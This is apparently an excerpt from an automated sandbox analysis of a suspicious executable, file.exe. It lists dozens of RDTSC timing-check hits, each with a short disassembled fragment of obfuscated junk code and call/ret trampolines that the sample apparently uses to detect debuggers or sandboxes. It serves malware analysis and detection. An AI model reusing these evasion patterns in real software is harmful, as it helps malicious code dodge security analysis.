                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87AFD1 second address: 87AFD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B231 second address: 87B235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B235 second address: 87B23B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B23B second address: 87B23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B4FA second address: 87B508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F43A4FCF696h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B6C3 second address: 87B6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C4A9 second address: 87C4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CD7C second address: 87CD80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CD80 second address: 87CD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87F867 second address: 87F86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8801D6 second address: 880238 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43A4FCF696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F43A4FCF698h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F43A4FCF698h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D2D0Dh] 0x00000036 push 00000000h 0x00000038 sub dword ptr [ebp+12453B11h], eax 0x0000003e push 00000000h 0x00000040 call 00007F43A4FCF69Bh 0x00000045 push esi 0x00000046 jl 00007F43A4FCF696h 0x0000004c pop edi 0x0000004d pop esi 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 push ecx 0x00000052 pushad 0x00000053 popad 0x00000054 pop ecx 0x00000055 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880238 second address: 88025C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88025C second address: 880260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880C60 second address: 880C92 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43A4BB4C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007F43A4BB4C26h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F43A4BB4C38h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8809FF second address: 880A04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880C92 second address: 880C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880C96 second address: 880C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885A49 second address: 885ABA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F43A4BB4C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jnp 00007F43A4BB4C26h 0x00000011 pop edi 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F43A4BB4C28h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov ebx, dword ptr [ebp+122D29B7h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007F43A4BB4C28h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 push 00000000h 0x00000054 add di, C14Ah 0x00000059 xchg eax, esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884D49 second address: 884D53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F43A4FCF696h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885ABA second address: 885ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885ABF second address: 885AE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F43A4FCF6A1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43A4FCF69Dh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885AE8 second address: 885AED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88796C second address: 887A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F43A4FCF69Ch 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F43A4FCF6A2h 0x00000013 nop 0x00000014 xor edi, 17039F4Ah 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F43A4FCF698h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 jc 00007F43A4FCF69Eh 0x0000003c jnl 00007F43A4FCF698h 0x00000042 add dword ptr [ebp+124510E4h], ecx 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F43A4FCF698h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 xchg eax, esi 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F43A4FCF69Fh 0x0000006c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8888B2 second address: 8888B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887B75 second address: 887B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8888B6 second address: 8888C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887B7B second address: 887B91 instructions: 0x00000000 rdtsc 0x00000002 je 00007F43A4FCF696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e ja 00007F43A4FCF69Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8888C0 second address: 888913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F43A4BB4C28h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov bx, dx 0x00000027 push 00000000h 0x00000029 mov edi, dword ptr [ebp+122D35AFh] 0x0000002f push 00000000h 0x00000031 mov bx, dx 0x00000034 push eax 0x00000035 pushad 0x00000036 jno 00007F43A4BB4C33h 0x0000003c push eax 0x0000003d push edx 0x0000003e push edi 0x0000003f pop edi 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887B91 second address: 887C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D25C3h], ecx 0x0000000c xor ebx, dword ptr [ebp+122D35A5h] 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F43A4FCF698h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 jmp 00007F43A4FCF6A0h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov ebx, dword ptr [ebp+122D34A2h] 0x00000045 mov eax, dword ptr [ebp+122D1659h] 0x0000004b push eax 0x0000004c mov dword ptr [ebp+122D2CF6h], ebx 0x00000052 pop edi 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007F43A4FCF698h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 0000001Bh 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f mov ebx, ecx 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887C24 second address: 887C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887C28 second address: 887C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887C2C second address: 887C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887C32 second address: 887C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887C38 second address: 887C3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889874 second address: 889878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889878 second address: 88987C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88987C second address: 889913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43A4FCF6A5h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F43A4FCF698h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D2ADBh] 0x0000002f mov ebx, dword ptr [ebp+122D2B0Fh] 0x00000035 push 00000000h 0x00000037 movzx edi, bx 0x0000003a push 00000000h 0x0000003c cld 0x0000003d xchg eax, esi 0x0000003e jmp 00007F43A4FCF69Ch 0x00000043 push eax 0x00000044 pushad 0x00000045 pushad 0x00000046 jmp 00007F43A4FCF6A1h 0x0000004b jl 00007F43A4FCF696h 0x00000051 popad 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F43A4FCF6A5h 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888A5A second address: 888A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888A70 second address: 888A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88AC81 second address: 88AC8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88AC8B second address: 88AC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88AC8F second address: 88AC93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88CB0A second address: 88CB0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EA43 second address: 88EA47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88FB0F second address: 88FB15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 890B5E second address: 890B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892A61 second address: 892A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892A67 second address: 892A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 890D49 second address: 890D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D771 second address: 83D782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b je 00007F43A4BB4C26h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D782 second address: 83D786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894F70 second address: 894F76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894F76 second address: 894F80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F43A4FCF696h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89419B second address: 8941C0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43A4BB4C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F43A4BB4C28h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A726 second address: 89A72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8427AC second address: 8427B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8427B2 second address: 8427F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43A4FCF69Bh 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F43A4FCF6A1h 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BC6C second address: 89BC7A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F43A4BB4C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BC7A second address: 89BC90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43A4FCF6A2h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840D0F second address: 840D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EEF6 second address: 89EEFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EEFC second address: 89EF00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A73CD second address: 8A73D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC056 second address: 8AC08A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Eh 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F43A4BB4C39h 0x0000000f jne 00007F43A4BB4C26h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC1EA second address: 8AC221 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF69Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F43A4FCF69Ah 0x00000011 jmp 00007F43A4FCF69Dh 0x00000016 jmp 00007F43A4FCF69Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC383 second address: 8AC38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC38B second address: 8AC393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC91F second address: 8AC947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C37h 0x00000009 jmp 00007F43A4BB4C2Dh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC947 second address: 8AC94B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ACBC9 second address: 8ACBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ACBCD second address: 8ACC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43A4FCF6A8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43A4FCF6A4h 0x00000012 push ecx 0x00000013 jns 00007F43A4FCF696h 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop ecx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B12F3 second address: 8B130B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 jng 00007F43A4BB4C26h 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8403 second address: 8F8408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8408 second address: 8F840E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8564 second address: 8F856A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 904113 second address: 90412D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C36h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 908E5A second address: 908E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 908E5E second address: 908E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jbe 00007F43A4BB4C26h 0x0000000d pop edx 0x0000000e popad 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912253 second address: 91225D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F43A4FCF696h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91225D second address: 912263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912263 second address: 912269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920614 second address: 92062B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C33h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92062B second address: 920649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jnp 00007F43A4FCF696h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9207B3 second address: 9207BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9207BB second address: 9207BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920A5B second address: 920A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43A4BB4C36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920A76 second address: 920A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
